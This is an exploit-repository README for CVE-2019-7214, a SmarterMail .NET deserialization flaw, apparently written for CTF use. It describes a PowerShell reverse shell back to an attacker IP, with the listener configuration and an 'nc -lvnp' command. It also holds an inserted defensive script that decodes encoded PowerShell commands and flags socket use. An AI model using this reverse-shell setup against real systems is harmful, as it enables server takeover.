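Related vulnerability
Title: SmarterTools SmarterMail code issue vulnerability (CVE-2019-7214)
Description: SmarterTools SmarterMail is a mail server software suite from SmarterTools, a US company. It supports spam filtering, statistics, Simple Mail Transfer Protocol (SMTP) authentication, and other features. A security vulnerability exists in 16.x versions of SmarterTools SmarterMail before build 6985. An attacker can exploit this vulnerability to run commands on the server.
Description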
For CTF use only (the CVE-2019-7214 also resolves the host from /etc/hosts)
Introduction
# Windows Reverse Shell Exploit (PowerShell over TCP)
This Python script targets a vulnerable service running on a remote Windows machine. It sends a serialized .NET payload that launches a PowerShell-based reverse shell back to the attacker's machine.
# CVE-2019-7214
Remote Code Execution in .NET deserialization for the SmarterMail system.
---
## ⚙️ Configuration
Update the script’s configuration section to match your environment:
```python
HOSTNAME = 'hostname' # Target hostname (resolved via /etc/hosts)
PORT = 9999 # Target port listening for serialized input
LHOST = '192.168.45.185' # Attacker IP (listener)
LPORT = 4444 # Attacker listening port
```
---
## 🧪 What It Does
- Resolves the target's hostname to an IP address.
- Constructs a PowerShell reverse shell command.
- Base64-encodes the command in UTF-16LE format.
- Appends it to a pre-built serialized .NET payload blob.
- Sends the payload over a TCP connection to the target.
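Base64 over UTF-16LE, the encoding step in the list above, is the format PowerShell's `-EncodedCommand` parameter expects, so a defender can reverse it when reviewing process-creation logs. The following is an added example, not code from this repository: it decodes such arguments and flags decoded commands that reference socket classes. The `(host, cmdline)` event shape, the host names, the sample command lines and the marker list are all constructed assumptions.

```python
import base64
import binascii
import re

# A PowerShell parameter starting with "e", followed by a Base64-looking argument.
FLAG_RE = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/]+={0,2})")
# Assumed indicator list for illustration; tune it to your environment.
NETWORK_MARKERS = ("net.sockets.tcpclient", "getstream(")

def decode_encoded_command(cmdline):
    """Return the decoded text of an -EncodedCommand argument, or None."""
    for flag, blob in FLAG_RE.findall(cmdline):
        name = flag.lower()
        if not ("encodedcommand".startswith(name) or name == "ec"):
            continue  # some other parameter, e.g. -ExecutionPolicy
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 / UTF-16LE, keep looking
    return None

def triage(events):
    """events: iterable of (host, cmdline). Returns (host, decoded, uses_network)."""
    findings = []
    for host, cmdline in events:
        decoded = decode_encoded_command(cmdline)
        if decoded is None:
            continue
        lowered = decoded.lower()
        findings.append((host, decoded, any(m in lowered for m in NETWORK_MARKERS)))
    return findings

def _enc(text):
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation events (not real log data).
SAMPLE_EVENTS = [
    ("mail01", "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc "
               + _enc("$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444)")),
    ("ws07", "powershell.exe -EncodedCommand " + _enc("Get-Date")),
    ("ws09", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for host, decoded, uses_network in triage(SAMPLE_EVENTS):
        print(host, "NETWORK" if uses_network else "review", decoded)
```

An encoded PowerShell child of a mail server process that decodes to socket code is worth escalating regardless of what the rest of the command does.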
---
## 🛠 Requirements
- Python 3.x
- Netcat or a similar tool listening on the attacker's port:
```bash
nc -lvnp 4444
```
---
## 🚀 Usage
```bash
python3 CVE-2019-7214.py
```
If successful, you'll get a PowerShell prompt from the target on your listener.
---
## 🧼 Notes
- Make sure the target accepts serialized .NET input over the specified port.
- This script assumes the target can execute deserialized objects containing `System.Management.Automation` functionality.
- Be careful with spacing, encoding, and payload size – the PowerShell command is padded to exactly 1360 bytes to avoid corruption.
---
## ⚠️ Disclaimer
This script is provided for **educational purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
File snapshot
[4.0K] /data/pocs/a414032aaa851f72389667fcf59e3f6000c82ca6
├── [3.5K] CVE-2019-7214.py
└── [1.8K] README.md
0 directories, 2 files